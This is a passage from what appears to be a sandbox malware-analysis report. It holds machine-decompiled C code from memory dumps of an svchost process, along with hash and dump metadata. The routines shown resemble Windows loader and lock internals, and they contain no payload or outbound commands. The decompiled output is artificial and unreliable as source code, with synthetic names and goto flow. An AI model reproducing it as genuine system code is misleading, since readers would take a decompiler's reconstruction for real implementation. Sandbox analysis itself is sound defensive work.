                        										_v72 =  !(_t231 >> 2) & 0xffffff01;
                        									}
                        									asm("lock cmpxchg [edi], esi");
                        									_t262 = _t231;
                        									__eflags = _t262 - _t231;
                        									if(_t262 != _t231) {
                        										goto L92;
                        									} else {
                        										__eflags = _v72;
                        										if(_v72 != 0) {
                        											E0306006A(0x3118608, _t210);
                        										}
                        										__eflags =  *0x7ffe036a - 1;
                        										if(__eflags <= 0) {
                        											L89:
                        											_t133 =  &_v16;
                        											asm("lock btr dword [eax], 0x1");
                        											if(__eflags >= 0) {
                        												goto L93;
                        											} else {
                        												goto L90;
                        											}
                        											do {
                        												L90:
                        												_push(0);
                        												_push(0x3118608);
                        												E0306B180();
                        												_t133 = _v24;
                        												__eflags = _t133 & 0x00000004;
                        											} while ((_t133 & 0x00000004) == 0);
                        											goto L93;
                        										} else {
                        											_t218 =  *0x3116904; // 0x400
                        											__eflags = _t218;
                        											if(__eflags == 0) {
                        												goto L89;
                        											} else {
                        												goto L87;
                        											}
                        											while(1) {
                        												L87:
                        												__eflags = _v16 & 0x00000002;
                        												if(__eflags == 0) {
                        													goto L89;
                        												}
                        												asm("pause");
                        												_t218 = _t218 - 1;
                        												__eflags = _t218;
                        												if(__eflags != 0) {
                        													continue;
                        												}
                        												goto L89;
                        											}
                        											goto L89;
                        										}
                        									}
                        								}
                        							}
                        							L10:
                        							_t229 =  *0x3116e48; // 0x0
                        							_v72 = _t229;
                        							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        								E0303FFB0(_t198, _t240, 0x3118608);
                        								_t253 = _v76;
                        								goto L29;
                        							} else {
                        								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                        								asm("lock cmpxchg [esi], ecx");
                        								_t215 = 1;
                        								if(1 != 1) {
                        									while(1) {
                        										_t246 = _t215 & 0x00000006;
                        										_t180 = _t215;
                        										__eflags = _t246 - 2;
                        										_v56 = _t246;
                        										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                        										asm("lock cmpxchg [edi], esi");
                        										_t248 = _v56;
                        										__eflags = _t180 - _t215;
                        										if(_t180 == _t215) {
                        											break;
                        										}
                        										_t215 = _t180;
                        									}
                        									__eflags = _t248 - 2;
                        									if(_t248 == 2) {
                        										__eflags = 0;
                        										E030600C2(0x3118608, 0, _t235);
                        									}
                        									_t229 = _v72;
                        								}
                        								goto L14;
                        							}
                        						}
                        					}
                        				}
                        				_t227 = 0;
                        				_v75 = 0;
                        				if(_t128 != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}
                        0x00000000
                        0x00000000
                        0x03095974
                        0x00000000
                        0x03095967
                        0x0309595b
                        0x03095942
                        0x03095863
                        0x03052143
                        0x03052143
                        0x03052149
                        0x0305214f
                        0x030522f1
                        0x030522f6
                        0x00000000
                        0x03052173
                        0x03052173
                        0x0305217d
                        0x03052181
                        0x03052186
                        0x030959ae
                        0x030959b2
                        0x030959b5
                        0x030959b7
                        0x030959ba
                        0x030959cd
                        0x030959d1
                        0x030959d5
                        0x030959d9
                        0x030959db
                        0x00000000
                        0x00000000
                        0x030959dd
                        0x030959dd
                        0x030959e1
                        0x030959e4
                        0x030959e7
                        0x030959ee
                        0x030959ee
                        0x030959f3
                        0x030959f3
                        0x00000000
                        0x03052186
                        0x0305214f
                        0x03052106
                        0x03052266
                        0x030520d8
                        0x030520da
                        0x030520e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 758ff20b7b024ba72385e25f5c1029f961c0856baa07166b5f9db054e5624ef1
                        • Instruction ID: ef645060ae031cebaed83df974bc7baafcc612cc0e89460694a7d407925ed7c7
                        • Opcode Fuzzy Hash: 758ff20b7b024ba72385e25f5c1029f961c0856baa07166b5f9db054e5624ef1
                        • Instruction Fuzzy Hash: 77F1F43560A3059FEB66CB29C84076BB7EDAF86314F088D5EFC959B280D734D841CB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E0303D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				signed int _v36;
                        				intOrPtr* _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed char _v52;
                        				signed int _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				intOrPtr _v80;
                        				signed int _v84;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				signed int _v108;
                        				signed int _v112;
                        				signed int _v116;
                        				intOrPtr _v120;
                        				signed int _v132;
                        				char _v140;
                        				char _v144;
                        				char _v157;
                        				signed int _v164;
                        				signed int _v168;
                        				signed int _v169;
                        				intOrPtr _v176;
                        				signed int _v180;
                        				signed int _v184;
                        				intOrPtr _v188;
                        				signed int _v192;
                        				signed int _v200;
                        				signed int _v208;
                        				intOrPtr* _v212;
                        				char _v216;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t204;
                        				signed int _t206;
                        				void* _t208;
                        				signed int _t211;
                        				signed int _t216;
                        				intOrPtr _t217;
                        				intOrPtr* _t218;
                        				signed int _t226;
                        				signed int _t239;
                        				signed int* _t247;
                        				signed int _t249;
                        				void* _t252;
                        				signed int _t256;
                        				signed int _t269;
                        				signed int _t271;
                        				signed int _t277;
                        				signed int _t279;
                        				intOrPtr _t283;
                        				signed int _t287;
                        				signed int _t288;
                        				void* _t289;
                        				signed char _t290;
                        				signed int _t292;
                        				signed int* _t293;
                        				unsigned int _t297;
                        				signed int _t306;
                        				signed int _t307;
                        				signed int _t308;
                        				signed int _t309;
                        				signed int _t310;
                        				intOrPtr _t311;
                        				intOrPtr _t312;
                        				signed int _t319;
                        				signed int _t320;
                        				signed int* _t324;
                        				signed int _t337;
                        				signed int _t338;
                        				signed int _t339;
                        				signed int* _t340;
                        				void* _t341;
                        				signed int _t344;
                        				signed int _t348;
                        				signed int _t349;
                        				signed int _t351;
                        				intOrPtr _t353;
                        				void* _t354;
                        				signed int _t356;
                        				signed int _t358;
                        				intOrPtr _t359;
                        				signed int _t361;
                        				signed int _t363;
                        				signed short* _t365;
                        				void* _t367;
                        				intOrPtr _t369;
                        				void* _t370;
                        				signed int _t371;
                        				signed int _t372;
                        				void* _t374;
                        				signed int _t376;
                        				void* _t384;
                        				signed int _t387;
                        
                        				_v8 =  *0x311d360 ^ _t376;
                        				_t2 =  &_a20;
                        				 *_t2 = _a20 & 0x00000001;
                        				_t287 = _a4;
                        				_v200 = _a12;
                        				_t365 = _a8;
                        				_v212 = _a16;
                        				_v180 = _a24;
                        				_v168 = 0;
                        				_v157 = 0;
                        				if( *_t2 != 0) {
                        					__eflags = E03036600(0x31152d8);
                        					if(__eflags == 0) {
                        						goto L1;
                        					} else {
                        						_v188 = 6;
                        					}
                        				} else {
                        					L1:
                        					_v188 = 9;
                        				}
                        				if(_t365 == 0) {
                        					_v164 = 0;
                        					goto L5;
                        				} else {
                        					_t363 =  *_t365 & 0x0000ffff;
                        					_t341 = _t363 + 1;
                        					if((_t365[1] & 0x0000ffff) < _t341) {
                        						L109:
                        						__eflags = _t341 - 0x80;
                        						if(_t341 <= 0x80) {
                        							_t281 =  &_v140;
                        							_v164 =  &_v140;
                        							goto L114;
                        						} else {
                        							_t283 =  *0x3117b9c; // 0x0
                        							_t281 = L03044620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                        							_v164 = _t281;
                        							__eflags = _t281;
                        							if(_t281 != 0) {
                        								_v157 = 1;
                        								L114:
                        								E0306F3E0(_t281, _t365[2], _t363);
                        								_t200 = _v164;
                        								 *((char*)(_v164 + _t363)) = 0;
                        								goto L5;
                        							} else {
                        								_t204 = 0xc000009a;
                        								goto L47;
                        							}
                        						}
                        					} else {
                        						_t200 = _t365[2];
                        						_v164 = _t200;
                        						if( *((char*)(_t200 + _t363)) != 0) {
                        							goto L109;
                        						} else {
                        							while(1) {
                        								L5:
                        								_t353 = 0;
                        								_t342 = 0x1000;
                        								_v176 = 0;
                        								if(_t287 == 0) {
                        									break;
                        								}
                        								_t384 = _t287 -  *0x3117b90; // 0x77380000
                        								if(_t384 == 0) {
                        									_t353 =  *0x3117b8c; // 0x2803458
                        									_v176 = _t353;
                        									_t320 = ( *(_t353 + 0x50))[8];
                        									_v184 = _t320;
                        								} else {
                        									E03042280(_t200, 0x31184d8);
                        									_t277 =  *0x31185f4; // 0x2804700
                        									_t351 =  *0x31185f8 & 1;
                        									while(_t277 != 0) {
                        										_t337 =  *(_t277 - 0x50);
                        										if(_t337 > _t287) {
                        											_t338 = _t337 | 0xffffffff;
                        										} else {
                        											asm("sbb ecx, ecx");
                        											_t338 =  ~_t337;
                        										}
                        										_t387 = _t338;
                        										if(_t387 < 0) {
                        											_t339 =  *_t277;
                        											__eflags = _t351;
                        											if(_t351 != 0) {
                        												__eflags = _t339;
                        												if(_t339 == 0) {
                        													goto L16;
                        												} else {
                        													goto L118;
                        												}
                        												goto L151;
                        											} else {
                        												goto L16;
                        											}
                        											goto L17;
                        										} else {
                        											if(_t387 <= 0) {
                        												__eflags = _t277;
                        												if(_t277 != 0) {
                        													_t340 =  *(_t277 - 0x18);
                        													_t24 = _t277 - 0x68; // 0x2804698
                        													_t353 = _t24;
                        													_v176 = _t353;
                        													__eflags = _t340[3] - 0xffffffff;
                        													if(_t340[3] != 0xffffffff) {
                        														_t279 =  *_t340;
                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                        															asm("lock inc dword [edi+0x9c]");
                        															_t340 =  *(_t353 + 0x50);
                        														}
                        													}
                        													_v184 = _t340[8];
                        												}
                        											} else {
                        												_t339 =  *(_t277 + 4);
                        												if(_t351 != 0) {
                        													__eflags = _t339;
                        													if(_t339 == 0) {
                        														goto L16;
                        													} else {
                        														L118:
                        														_t277 = _t277 ^ _t339;
                        														goto L17;
                        													}
                        													goto L151;
                        												} else {
                        													L16:
                        													_t277 = _t339;
                        												}
                        												goto L17;
                        											}
                        										}
                        										goto L25;
                        										L17:
                        									}
                        									L25:
                        									E0303FFB0(_t287, _t353, 0x31184d8);
                        									_t320 = _v184;
                        									_t342 = 0x1000;
                        								}
                        								if(_t353 == 0) {
                        									break;
                        								} else {
                        									_t366 = 0;
                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                        										_t288 = _v164;
                        										if(_t353 != 0) {
                        											_t342 = _t288;
                        											_t374 = E0307CC99(_t353, _t288, _v200, 1,  &_v168);
                        											if(_t374 >= 0) {
                        												if(_v184 == 7) {
                        													__eflags = _a20;
                        													if(__eflags == 0) {
                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                        														if(__eflags != 0) {
                        															_t271 = E03036600(0x31152d8);
                        															__eflags = _t271;
                        															if(__eflags == 0) {
                        																_t342 = 0;
                        																_v169 = _t271;
                        																_t374 = E03037926( *(_t353 + 0x50), 0,  &_v169);
                        															}
                        														}
                        													}
                        												}
                        												if(_t374 < 0) {
                        													_v168 = 0;
                        												} else {
                        													if( *0x311b239 != 0) {
                        														_t342 =  *(_t353 + 0x18);
                        														E030AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                        													}
                        													if( *0x3118472 != 0) {
                        														_v192 = 0;
                        														_t342 =  *0x7ffe0330;
                        														_t361 =  *0x311b218; // 0x0
                        														asm("ror edi, cl");
                        														 *0x311b1e0( &_v192, _t353, _v168, 0, _v180);
                        														 *(_t361 ^  *0x7ffe0330)();
                        														_t269 = _v192;
                        														_t353 = _v176;
                        														__eflags = _t269;
                        														if(__eflags != 0) {
                        															_v168 = _t269;
                        														}
                        													}
                        												}
                        											}
                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                        												_t366 = 0xc000007a;
                        											}
                        											_t247 =  *(_t353 + 0x50);
                        											if(_t247[3] == 0xffffffff) {
                        												L40:
                        												if(_t366 == 0xc000007a) {
                        													__eflags = _t288;
                        													if(_t288 == 0) {
                        														goto L136;
                        													} else {
                        														_t366 = 0xc0000139;
                        													}
                        													goto L54;
                        												}
                        											} else {
                        												_t249 =  *_t247;
                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                        													goto L40;
                        												} else {
                        													_t250 = _t249 | 0xffffffff;
                        													asm("lock xadd [edi+0x9c], eax");
                        													if((_t249 | 0xffffffff) == 0) {
                        														E03042280(_t250, 0x31184d8);
                        														_t342 =  *(_t353 + 0x54);
                        														_t165 = _t353 + 0x54; // 0x54
                        														_t252 = _t165;
                        														__eflags =  *(_t342 + 4) - _t252;
                        														if( *(_t342 + 4) != _t252) {
                        															L135:
                        															asm("int 0x29");
                        															L136:
                        															_t288 = _v200;
                        															_t366 = 0xc0000138;
                        															L54:
                        															_t342 = _t288;
                        															L03063898(0, _t288, _t366);
                        														} else {
                        															_t324 =  *(_t252 + 4);
                        															__eflags =  *_t324 - _t252;
                        															if( *_t324 != _t252) {
                        																goto L135;
                        															} else {
                        																 *_t324 = _t342;
                        																 *(_t342 + 4) = _t324;
                        																_t293 =  *(_t353 + 0x50);
                        																_v180 =  *_t293;
                        																E0303FFB0(_t293, _t353, 0x31184d8);
                        																__eflags =  *((short*)(_t353 + 0x3a));
                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                        																	_t342 = 0;
                        																	__eflags = 0;
                        																	E030637F5(_t353, 0);
                        																}
                        																E03060413(_t353);
                        																_t256 =  *(_t353 + 0x48);
                        																__eflags = _t256;
                        																if(_t256 != 0) {
                        																	__eflags = _t256 - 0xffffffff;
                        																	if(_t256 != 0xffffffff) {
                        																		E03059B10(_t256);
                        																	}
                        																}
                        																__eflags =  *(_t353 + 0x28);
                        																if( *(_t353 + 0x28) != 0) {
                        																	_t174 = _t353 + 0x24; // 0x24
                        																	E030502D6(_t174);
                        																}
                        																L030477F0( *0x3117b98, 0, _t353);
                        																__eflags = _v180 - _t293;
                        																if(__eflags == 0) {
                        																	E0305C277(_t293, _t366);
                        																}
                        																_t288 = _v164;
                        																goto L40;
                        															}
                        														}
                        													} else {
                        														goto L40;
                        													}
                        												}
                        											}
                        										}
                        									} else {
                        										L0303EC7F(_t353);
                        										L030519B8(_t287, 0, _t353, 0);
                        										_t200 = E0302F4E3(__eflags);
                        										continue;
                        									}
                        								}
                        								L41:
                        								if(_v157 != 0) {
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                        								}
                        								if(_t366 < 0) {
                        									L46:
                        									 *_v212 = _v168;
                        									_t204 = _t366;
                        									L47:
                        									_pop(_t354);
                        									_pop(_t367);
                        									_pop(_t289);
                        									return E0306B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                        								} else {
                        									_t206 =  *0x311b2f8; // 0x300000
                        									if((_t206 |  *0x311b2fc) == 0 || ( *0x311b2e4 & 0x00000001) != 0) {
                        										goto L46;
                        									} else {
                        										_t297 =  *0x311b2ec; // 0x100
                        										_v200 = 0;
                        										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                        											_t355 = _v168;
                        											_t342 =  &_v208;
                        											_t208 = E030D6B68(_v168,  &_v208, _v168, __eflags);
                        											__eflags = _t208 - 1;
                        											if(_t208 == 1) {
                        												goto L46;
                        											} else {
                        												__eflags = _v208 & 0x00000010;
                        												if((_v208 & 0x00000010) == 0) {
                        													goto L46;
                        												} else {
                        													_t342 = 4;
                        													_t366 = E030D6AEB(_t355, 4,  &_v216);
                        													__eflags = _t366;
                        													if(_t366 >= 0) {
                        														goto L46;
                        													} else {
                        														asm("int 0x29");
                        														_t356 = 0;
                        														_v44 = 0;
                        														_t290 = _v52;
                        														__eflags = 0;
                        														if(0 == 0) {
                        															L108:
                        															_t356 = 0;
                        															_v44 = 0;
                        															goto L63;
                        														} else {
                        															__eflags = 0;
                        															if(0 < 0) {
                        																goto L108;
                        															}
                        															L63:
                        															_v112 = _t356;
                        															__eflags = _t356;
                        															if(_t356 == 0) {
                        																L143:
                        																_v8 = 0xfffffffe;
                        																_t211 = 0xc0000089;
                        															} else {
                        																_v36 = 0;
                        																_v60 = 0;
                        																_v48 = 0;
                        																_v68 = 0;
                        																_v44 = _t290 & 0xfffffffc;
                        																E0303E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                        																_t306 = _v68;
                        																__eflags = _t306;
                        																if(_t306 == 0) {
                        																	_t216 = 0xc000007b;
                        																	_v36 = 0xc000007b;
                        																	_t307 = _v60;
                        																} else {
                        																	__eflags = _t290 & 0x00000001;
                        																	if(__eflags == 0) {
                        																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                        																		__eflags = _t349 - 0x10b;
                        																		if(_t349 != 0x10b) {
                        																			__eflags = _t349 - 0x20b;
                        																			if(_t349 == 0x20b) {
                        																				goto L102;
                        																			} else {
                        																				_t307 = 0;
                        																				_v48 = 0;
                        																				_t216 = 0xc000007b;
                        																				_v36 = 0xc000007b;
                        																				goto L71;
                        																			}
                        																		} else {
                        																			L102:
                        																			_t307 =  *(_t306 + 0x50);
                        																			goto L69;
                        																		}
                        																		goto L151;
                        																	} else {
                        																		_t239 = L0303EAEA(_t290, _t290, _t356, _t366, __eflags);
                        																		_t307 = _t239;
                        																		_v60 = _t307;
                        																		_v48 = _t307;
                        																		__eflags = _t307;
                        																		if(_t307 != 0) {
                        																			L70:
                        																			_t216 = _v36;
                        																		} else {
                        																			_push(_t239);
                        																			_push(0x14);
                        																			_push( &_v144);
                        																			_push(3);
                        																			_push(_v44);
                        																			_push(0xffffffff);
                        																			_t319 = E03069730();
                        																			_v36 = _t319;
                        																			__eflags = _t319;
                        																			if(_t319 < 0) {
                        																				_t216 = 0xc000001f;
                        																				_v36 = 0xc000001f;
                        																				_t307 = _v60;
                        																			} else {
                        																				_t307 = _v132;
                        																				L69:
                        																				_v48 = _t307;
                        																				goto L70;
                        																			}
                        																		}
                        																	}
                        																}
                        																L71:
                        																_v72 = _t307;
                        																_v84 = _t216;
                        																__eflags = _t216 - 0xc000007b;
                        																if(_t216 == 0xc000007b) {
                        																	L150:
                        																	_v8 = 0xfffffffe;
                        																	_t211 = 0xc000007b;
                        																} else {
                        																	_t344 = _t290 & 0xfffffffc;
                        																	_v76 = _t344;
                        																	__eflags = _v40 - _t344;
                        																	if(_v40 <= _t344) {
                        																		goto L150;
                        																	} else {
                        																		__eflags = _t307;
                        																		if(_t307 == 0) {
                        																			L75:
                        																			_t217 = 0;
                        																			_v104 = 0;
                        																			__eflags = _t366;
                        																			if(_t366 != 0) {
                        																				__eflags = _t290 & 0x00000001;
                        																				if((_t290 & 0x00000001) != 0) {
                        																					_t217 = 1;
                        																					_v104 = 1;
                        																				}
                        																				_t290 = _v44;
                        																				_v52 = _t290;
                        																			}
                        																			__eflags = _t217 - 1;
                        																			if(_t217 != 1) {
                        																				_t369 = 0;
                        																				_t218 = _v40;
                        																				goto L91;
                        																			} else {
                        																				_v64 = 0;
                        																				E0303E9C0(1, _t290, 0, 0,  &_v64);
                        																				_t309 = _v64;
                        																				_v108 = _t309;
                        																				__eflags = _t309;
                        																				if(_t309 == 0) {
                        																					goto L143;
                        																				} else {
                        																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                        																					__eflags = _t226 - 0x10b;
                        																					if(_t226 != 0x10b) {
                        																						__eflags = _t226 - 0x20b;
                        																						if(_t226 != 0x20b) {
                        																							goto L143;
                        																						} else {
                        																							_t371 =  *(_t309 + 0x98);
                        																							goto L83;
                        																						}
                        																					} else {
                        																						_t371 =  *(_t309 + 0x88);
                        																						L83:
                        																						__eflags = _t371;
                        																						if(_t371 != 0) {
                        																							_v80 = _t371 - _t356 + _t290;
                        																							_t310 = _v64;
                        																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                        																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                        																							_t311 = 0;
                        																							__eflags = 0;
                        																							while(1) {
                        																								_v120 = _t311;
                        																								_v116 = _t348;
                        																								__eflags = _t311 - _t292;
                        																								if(_t311 >= _t292) {
                        																									goto L143;
                        																								}
                        																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                        																								__eflags = _t371 - _t359;
                        																								if(_t371 < _t359) {
                        																									L98:
                        																									_t348 = _t348 + 0x28;
                        																									_t311 = _t311 + 1;
                        																									continue;
                        																								} else {
                        																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                        																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                        																										goto L98;
                        																									} else {
                        																										__eflags = _t348;
                        																										if(_t348 == 0) {
                        																											goto L143;
                        																										} else {
                        																											_t218 = _v40;
                        																											_t312 =  *_t218;
                        																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                        																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                        																												_v100 = _t359;
                        																												_t360 = _v108;
                        																												_t372 = L03038F44(_v108, _t312);
                        																												__eflags = _t372;
                        																												if(_t372 == 0) {
                        																													goto L143;
                        																												} else {
                        																													_t290 = _v52;
                        																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03063C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                        																													_t307 = _v72;
                        																													_t344 = _v76;
                        																													_t218 = _v40;
                        																													goto L91;
                        																												}
                        																											} else {
                        																												_t290 = _v52;
                        																												_t307 = _v72;
                        																												_t344 = _v76;
                        																												_t369 = _v80;
                        																												L91:
                        																												_t358 = _a4;
                        																												__eflags = _t358;
                        																												if(_t358 == 0) {
                        																													L95:
                        																													_t308 = _a8;
                        																													__eflags = _t308;
                        																													if(_t308 != 0) {
                        																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                        																													}
                        																													_v8 = 0xfffffffe;
                        																													_t211 = _v84;
                        																												} else {
                        																													_t370 =  *_t218 - _t369 + _t290;
                        																													 *_t358 = _t370;
                        																													__eflags = _t370 - _t344;
                        																													if(_t370 <= _t344) {
                        																														L149:
                        																														 *_t358 = 0;
                        																														goto L150;
                        																													} else {
                        																														__eflags = _t307;
                        																														if(_t307 == 0) {
                        																															goto L95;
                        																														} else {
                        																															__eflags = _t370 - _t344 + _t307;
                        																															if(_t370 >= _t344 + _t307) {
                        																																goto L149;
                        																															} else {
                        																																goto L95;
                        																															}
                        																														}
                        																													}
                        																												}
                        																											}
                        																										}
                        																									}
                        																								}
                        																								goto L97;
                        																							}
                        																						}
                        																						goto L143;
                        																					}
                        																				}
                        																			}
                        																		} else {
                        																			__eflags = _v40 - _t307 + _t344;
                        																			if(_v40 >= _t307 + _t344) {
                        																				goto L150;
                        																			} else {
                        																				goto L75;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        															L97:
                        															 *[fs:0x0] = _v20;
                        															return _t211;
                        														}
                        													}
                        												}
                        											}
                        										} else {
                        											goto L46;
                        										}
                        									}
                        								}
                        								goto L151;
                        							}
                        							_t288 = _v164;
                        							_t366 = 0xc0000135;
                        							goto L41;
                        						}
                        					}
                        				}
                        				L151:
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ecb49a011ae0e82b8fd01c21b913d1ebc6055f0f38de5df544d3e9c23a137782
                        • Instruction ID: 1f5b712e74b88f176fbf44217c76b38a5dbbdda8c82593e4fc1df088f43f2e99
                        • Opcode Fuzzy Hash: ecb49a011ae0e82b8fd01c21b913d1ebc6055f0f38de5df544d3e9c23a137782
                        • Instruction Fuzzy Hash: 11E1C374A06319CFDB64EF14C984BAEB7FABF86304F0841E9D8499B290D770A985CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E0303849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                        				void* _t136;
                        				signed int _t139;
                        				signed int _t141;
                        				signed int _t145;
                        				intOrPtr _t146;
                        				signed int _t149;
                        				signed int _t150;
                        				signed int _t161;
                        				signed int _t163;
                        				signed int _t165;
                        				signed int _t169;
                        				signed int _t171;
                        				signed int _t194;
                        				signed int _t200;
                        				void* _t201;
                        				signed int _t204;
                        				signed int _t206;
                        				signed int _t210;
                        				signed int _t214;
                        				signed int _t215;
                        				signed int _t218;
                        				void* _t221;
                        				signed int _t224;
                        				signed int _t226;
                        				intOrPtr _t228;
                        				signed int _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				void* _t237;
                        				void* _t238;
                        
                        				_t236 = __esi;
                        				_t235 = __edi;
                        				_t193 = __ebx;
                        				_push(0x70);
                        				_push(0x30ff9c0);
                        				E0307D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                        				if( *0x3117b04 == 0) {
                        					L4:
                        					goto L5;
                        				} else {
                        					_t136 = E0303CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                        					_t236 = 0;
                        					if(_t136 < 0) {
                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                        					}
                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                        						_t193 =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                        						 *(_t237 - 0x68) = _t236;
                        						 *(_t237 - 0x6c) = _t236;
                        						_t235 = _t236;
                        						 *(_t237 - 0x60) = _t236;
                        						E03042280( *[fs:0x30], 0x3118550);
                        						_t139 =  *0x3117b04; // 0x1
                        						__eflags = _t139 - 1;
                        						if(__eflags != 0) {
                        							_t200 = 0xc;
                        							_t201 = _t237 - 0x40;
                        							_t141 = E0305F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                        							 *(_t237 - 0x44) = _t141;
                        							__eflags = _t141;
                        							if(_t141 < 0) {
                        								L50:
                        								E0303FFB0(_t193, _t235, 0x3118550);
                        								L5:
                        								return E0307D130(_t193, _t235, _t236);
                        							}
                        							_push(_t201);
                        							_t221 = 0x10;
                        							_t202 =  *(_t237 - 0x40);
                        							_t145 = E03021C45( *(_t237 - 0x40), _t221);
                        							 *(_t237 - 0x44) = _t145;
                        							__eflags = _t145;
                        							if(_t145 < 0) {
                        								goto L50;
                        							}
                        							_t146 =  *0x3117b9c; // 0x0
                        							_t235 = L03044620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                        							 *(_t237 - 0x60) = _t235;
                        							__eflags = _t235;
                        							if(_t235 == 0) {
                        								_t149 = 0xc0000017;
                        								 *(_t237 - 0x44) = 0xc0000017;
                        							} else {
                        								_t149 =  *(_t237 - 0x44);
                        							}
                        							__eflags = _t149;
                        							if(__eflags >= 0) {
                        								L8:
                        								 *(_t237 - 0x64) = _t235;
                        								_t150 =  *0x3117b10; // 0x0
                        								 *(_t237 - 0x4c) = _t150;
                        								_push(_t237 - 0x74);
                        								_push(_t237 - 0x39);
                        								_push(_t237 - 0x58);
                        								_t193 = E0305A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                        								 *(_t237 - 0x44) = _t193;
                        								__eflags = _t193;
                        								if(_t193 < 0) {
                        									L30:
                        									E0303FFB0(_t193, _t235, 0x3118550);
                        									__eflags = _t235 - _t237 - 0x38;
                        									if(_t235 != _t237 - 0x38) {
                        										_t235 =  *(_t237 - 0x48);
                        										L030477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                        									} else {
                        										_t235 =  *(_t237 - 0x48);
                        									}
                        									__eflags =  *(_t237 - 0x6c);
                        									if( *(_t237 - 0x6c) != 0) {
                        										L030477F0(_t235, _t236,  *(_t237 - 0x6c));
                        									}
                        									__eflags = _t193;
                        									if(_t193 >= 0) {
                        										goto L4;
                        									} else {
                        										goto L5;
                        									}
                        								}
                        								_t204 =  *0x3117b04; // 0x1
                        								 *(_t235 + 8) = _t204;
                        								__eflags =  *((char*)(_t237 - 0x39));
                        								if( *((char*)(_t237 - 0x39)) != 0) {
                        									 *(_t235 + 4) = 1;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                        									_t161 =  *0x3117b10; // 0x0
                        									 *(_t237 - 0x4c) = _t161;
                        								} else {
                        									 *(_t235 + 4) = _t236;
                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                        								}
                        								 *((intOrPtr*)(_t237 - 0x54)) = E030637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                        								_t224 = _t236;
